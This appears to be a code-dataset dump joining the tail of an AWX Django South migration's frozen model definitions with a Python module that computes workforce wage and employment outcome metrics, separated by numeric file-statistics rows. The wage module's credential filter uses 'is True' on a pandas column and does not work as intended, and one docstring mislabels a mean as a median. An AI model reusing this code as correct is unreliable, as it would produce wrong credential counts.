'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'group': ('awx.main.fields.AutoOneToOneField', [], {'related_name': "'inventory_source'", 'null': 'True', 'default': 'None', 'to': "orm['main.Group']", 'blank': 'True', 'unique': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_sources'", 'null': 'True', 'to': "orm['main.Inventory']"}),
'last_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_source_as_last_update+'", 'null': 'True', 'to': "orm['main.InventoryUpdate']"}),
'last_update_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventorysource\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'overwrite_vars': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'source_path': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'source_regions': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'source_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'none'", 'max_length': '32'}),
'update_interval': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'update_on_launch': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'main.inventoryupdate': {
'Meta': {'object_name': 'InventoryUpdate'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventoryupdate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_updates'", 'to': "orm['main.InventorySource']"}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'license_error': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventoryupdate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'})
},
'main.job': {
'Meta': {'object_name': 'Job'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'cloud_credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs_as_cloud_credential+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'job\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Credential']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'extra_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'jobs'", 'blank': 'True', 'through': "orm['main.JobHostSummary']", 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'job_tags': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_template': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobTemplate']", 'blank': 'True', 'null': 'True'}),
'job_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'launch_type': ('django.db.models.fields.CharField', [], {'default': "'manual'", 'max_length': '20'}),
'limit': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'job\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'playbook': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'}),
'verbosity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'})
},
'main.jobevent': {
'Meta': {'ordering': "('pk',)", 'object_name': 'JobEvent'},
'changed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'event_data': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_events_as_primary_host'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Host']", 'blank': 'True', 'null': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'job_events'", 'blank': 'True', 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_events'", 'to': "orm['main.Job']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'children'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobEvent']", 'blank': 'True', 'null': 'True'}),
'play': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'task': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'})
},
'main.jobhostsummary': {
'Meta': {'ordering': "('-pk',)", 'unique_together': "[('job', 'host')]", 'object_name': 'JobHostSummary'},
'changed': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'dark': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_host_summaries'", 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_host_summaries'", 'to': "orm['main.Job']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'ok': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'processed': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'main.jobtemplate': {
'Meta': {'object_name': 'JobTemplate'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cloud_credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates_as_cloud_credential+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'jobtemplate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'extra_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'forks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'}),
'host_config_key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'job_tags': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'limit': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'jobtemplate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'playbook': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'job_templates'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'verbosity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'})
},
'main.organization': {
'Meta': {'object_name': 'Organization'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_of_organizations'", 'blank': 'True', 'to': u"orm['auth.User']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'organization\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'organization\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': "orm['main.Project']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': u"orm['auth.User']"})
},
'main.permission': {
'Meta': {'object_name': 'Permission'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'permission\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'permission\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'permission_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Project']"}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Team']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'permissions'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"})
},
'main.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ldap_dn': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('awx.main.fields.AutoOneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
'main.project': {
'Meta': {'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'project\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'projects'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Credential']"}),
'current_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'project_as_current_update+'", 'null': 'True', 'to': "orm['main.ProjectUpdate']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'project_as_last_update+'", 'null': 'True', 'to': "orm['main.ProjectUpdate']"}),
'last_update_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'local_path': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'project\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'scm_branch': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'scm_clean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_delete_on_next_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_delete_on_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '8', 'blank': 'True'}),
'scm_update_on_launch': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'scm_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'ok'", 'max_length': '32', 'null': 'True'})
},
'main.projectupdate': {
'Meta': {'object_name': 'ProjectUpdate'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'projectupdate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'projectupdate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_updates'", 'to': "orm['main.Project']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'})
},
'main.team': {
'Meta': {'unique_together': "[('organization', 'name')]", 'object_name': 'Team'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'team\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'team\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'teams'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'teams'", 'blank': 'True', 'to': "orm['main.Project']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'teams'", 'blank': 'True', 'to': u"orm['auth.User']"})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
complete_apps = ['main']
| 108.762332
| 271
| 0.574606
| 5,039
| 48,508
| 5.398492
| 0.047827
| 0.097048
| 0.16932
| 0.241885
| 0.901004
| 0.883836
| 0.868213
| 0.826747
| 0.779363
| 0.73139
| 0
| 0.005411
| 0.161891
| 48,508
| 445
| 272
| 109.006742
| 0.663707
| 0.005174
| 0
| 0.380282
| 0
| 0
| 0.607909
| 0.300379
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004695
| false
| 0.007042
| 0.00939
| 0
| 0.021127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8ac5fc05900df8dfee7bf6105f1f3ee5d4a98edf
| 4,752
|
py
|
Python
|
abacus_tpot/outcomes/wioa.py
|
workforce-data-initiative/tpot-abacus
|
a5abf4af544693e0c58f7891785718e7bc606ed6
|
[
"Apache-2.0"
] | 1
|
2019-09-09T20:52:49.000Z
|
2019-09-09T20:52:49.000Z
|
abacus_tpot/outcomes/wioa.py
|
workforce-data-initiative/tpot-abacus
|
a5abf4af544693e0c58f7891785718e7bc606ed6
|
[
"Apache-2.0"
] | 43
|
2018-02-11T11:24:18.000Z
|
2022-02-22T05:32:16.000Z
|
abacus_tpot/outcomes/wioa.py
|
workforce-data-initiative/tpot-abacus
|
a5abf4af544693e0c58f7891785718e7bc606ed6
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
from abacus_tpot import tpot_config
def median_wage_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
Return the median total wage for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
# Return the median
return np.nanmedian(wages_by_person.values)
def mean_wage_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
Return the median total wage for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
# Return the median
return np.nanmean(wages_by_person.values)
def employed_n_quarters_after_exit(wage_table, participants,
n_quarters):
"""
Return the percent employed for the Nth quarter after the
program exit date, for a list of participants.
"""
wage_table = wage_table[wage_table.participant_id.isin(participants)]
pd.options.mode.chained_assignment = None
wage_table['exit_quarter'] = pd.to_datetime(wage_table.exit_date.values).year * 4 +\
pd.to_datetime(wage_table.exit_date.values).quarter
wage_table['quarter'] = pd.to_datetime(wage_table.start_date.values).year * 4 +\
pd.to_datetime(wage_table.start_date.values).quarter
pd.options.mode.chained_assignment = 'warn'
wage_table = wage_table[wage_table.quarter ==
(wage_table.exit_quarter + n_quarters)]
wages_by_person = wage_table.groupby('participant_id').amount.sum()
# Check anonymization cutoff
if len(wages_by_person) < tpot_config.ANONYMIZATION_THRESHOLD:
return None
return len(wages_by_person.values[wages_by_person.values > 0])
def total_participants(participant_table, participants):
"""
Return the total number of unique participants in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table.participant_id.unique().shape[0]
def total_exits(participant_table, participants):
"""
Return the total number of unique exits in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table.dropna(subset=['exit_date']).participant_id.unique().shape[0]
def total_completed(participant_table, participants):
"""
Return the total number of unique completers in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table[participant_table.exit_type.isin(['Graduated', 'Suspended', 'Terminated'])].\
participant_id.unique().shape[0]
def obtained_credentials(participant_table, participants):
"""
Return the total number of credential obtainers in a participant list
"""
participant_table = participant_table[participant_table.participant_id.isin(
participants)]
return participant_table[participant_table.obtained_credentials is True].\
participant_id.unique().shape[0]
| 40.965517
| 106
| 0.717172
| 606
| 4,752
| 5.339934
| 0.135314
| 0.125155
| 0.125155
| 0.066749
| 0.895241
| 0.873918
| 0.865266
| 0.848269
| 0.832818
| 0.780902
| 0
| 0.002866
| 0.19234
| 4,752
| 115
| 107
| 41.321739
| 0.840281
| 0.147727
| 0
| 0.742424
| 0
| 0
| 0.037678
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106061
| false
| 0
| 0.045455
| 0
| 0.30303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
